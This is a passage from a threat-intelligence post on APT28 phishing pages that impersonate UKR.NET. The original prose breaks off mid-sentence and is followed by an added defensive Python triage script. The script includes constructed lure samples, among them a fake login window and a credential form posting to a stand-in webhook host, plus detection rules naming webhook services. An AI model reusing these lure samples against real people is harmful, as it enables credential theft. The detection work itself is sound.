The APT28 intrusion set (aka Sofacy, Pawn Storm, Fancy Bear), associated with the Russian GRU and known for its cyber espionage and sabotage campaigns, was observed using multiple phishing techniques to target Ukrainian civil society. These techniques include the use of HTTP webhook services such as Pipedream and Webhook, as well as compromised Ubiquiti routers, to steal victims' credentials. On one occasion, APT28 was seen using the "Browser in the Browser" technique to display a fake login page to the victim under the pretext of decrypting a document.
Most of the retrieved phishing webpages target the UKR.NET webmail service, which is popular in Ukraine. However, APT28 could apply the same techniques to other webmail services used by Western civil society organisations that support Ukraine.
This short blog post presents the different techniques APT28 uses to build its spear-phishing webpages, together with ways to detect them, including IOCs and YARA rules.
Technique 1: Browser in the browser
During their investigations, Sekoia.io TDR analysts identified a file named CDS Daily Brief 23.03.2023.html impersonating the Ukrainian security think tank Centre for Defence Strategies, which publishes online daily briefings on the Russo-Ukrainian conflict. The decoy document tricks the victim into clicking a button to "decrypt" the page content, which is presented as being protected by UKR.NET technology.
Clicking the button displays a fake login window. This window contains an iframe that embeds a fake UKR.NET login webpage hosted on robot-876.frge[.]io, which was deactivated during the investigation and was already
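As an added example (not code from the original post, nor a Sekoia.io tool), the following Python script triages an HTML attachment for the browser-in-the-browser pattern described in this section: a fake login "window" whose body is an iframe loaded from a host that does not belong to the impersonated brand, a spoofed address bar rendered as plain text showing the brand's real URL, and a credential form that posts to an external host or a webhook service. The sample HTML documents are constructed for this example and contain no real infrastructure; the set of legitimate UKR.NET hosts and the webhook-service domains are assumptions to adjust for your own environment.

```python
"""Triage helper for browser-in-the-browser (BitB) phishing lures.

The HTML samples below are constructed stand-ins for the kind of decoy
described on this page (a "decrypt" button revealing a fake login window
whose content is an iframe on an attacker host). Added example; not the
real CDS Daily Brief file.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumption: the impersonated brand's genuine login lives under ukr.net.
LEGIT_HOSTS = {"ukr.net"}
# Free request-bin / webhook services abused for credential exfiltration.
# pipedream.net is Pipedream's endpoint domain; webhook.site is assumed to be
# the "Webhook" service mentioned on this page.
WEBHOOK_HOSTS = {"pipedream.net", "webhook.site"}


class LureParser(HTMLParser):
    """Collects iframe sources, form actions and URL-looking text nodes."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.form_actions = []
        self.url_texts = []  # visible text that looks like a fake address bar

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "iframe" and a.get("src"):
            self.iframes.append(a["src"])
        elif tag == "form" and a.get("action"):
            self.form_actions.append(a["action"])

    def handle_data(self, data):
        text = data.strip()
        # A bare URL rendered as text is how BitB lures draw the address bar.
        if text.startswith(("https://", "http://")) and " " not in text:
            self.url_texts.append(text)


def host_of(url):
    return (urlparse(url).hostname or "").lower()


def is_under(host, domains):
    return any(host == d or host.endswith("." + d) for d in domains)


def triage(html):
    """Return a list of (finding, value) tuples; empty means nothing suspicious."""
    p = LureParser()
    p.feed(html)
    findings = []
    for src in p.iframes:
        h = host_of(src)
        if h and not is_under(h, LEGIT_HOSTS):
            findings.append(("iframe_external_login", h))
    for action in p.form_actions:
        h = host_of(action)
        if is_under(h, WEBHOOK_HOSTS):
            findings.append(("form_posts_to_webhook", h))
        elif h and not is_under(h, LEGIT_HOSTS):
            findings.append(("form_posts_external", h))
    for t in p.url_texts:
        # The brand's own URL drawn as text while the real content comes from
        # elsewhere is the signature of a spoofed browser window.
        if is_under(host_of(t), LEGIT_HOSTS):
            findings.append(("spoofed_address_bar", t))
    return findings


# Constructed sample: decrypt button + fake window + external iframe.
SAMPLE_LURE = """
<html><body>
<p>This briefing is encrypted. Click to decrypt.</p>
<button onclick="document.getElementById('win').style.display='block'">Decrypt</button>
<div id="win" style="display:none">
  <div class="titlebar">https://accounts.ukr.net/</div>
  <iframe src="https://login.example.invalid/ukr/index.html"></iframe>
</div>
</body></html>
"""

# Constructed sample: harvesting form posting to a webhook endpoint.
SAMPLE_HARVESTER = """
<html><body><form action="https://example.m.pipedream.net" method="post">
<input name="login"><input name="password" type="password"></form></body></html>
"""

# Constructed sample: benign page posting to the brand's own host.
SAMPLE_BENIGN = """
<html><body><form action="https://accounts.ukr.net/login" method="post">
<input name="login"></form></body></html>
"""

if __name__ == "__main__":
    for name, doc in (("lure", SAMPLE_LURE), ("harvester", SAMPLE_HARVESTER),
                      ("benign", SAMPLE_BENIGN)):
        print(name, triage(doc))
```

Run the script on any `.html` attachment by feeding its contents to `triage()`; hits on `iframe_external_login` together with `spoofed_address_bar` are the browser-in-the-browser combination, while `form_posts_to_webhook` matches the webhook-based credential theft mentioned at the top of the post. Text-based matching of this kind is cheap and brittle (obfuscated JavaScript building the iframe at runtime will evade it), so treat it as a triage filter rather than a verdict.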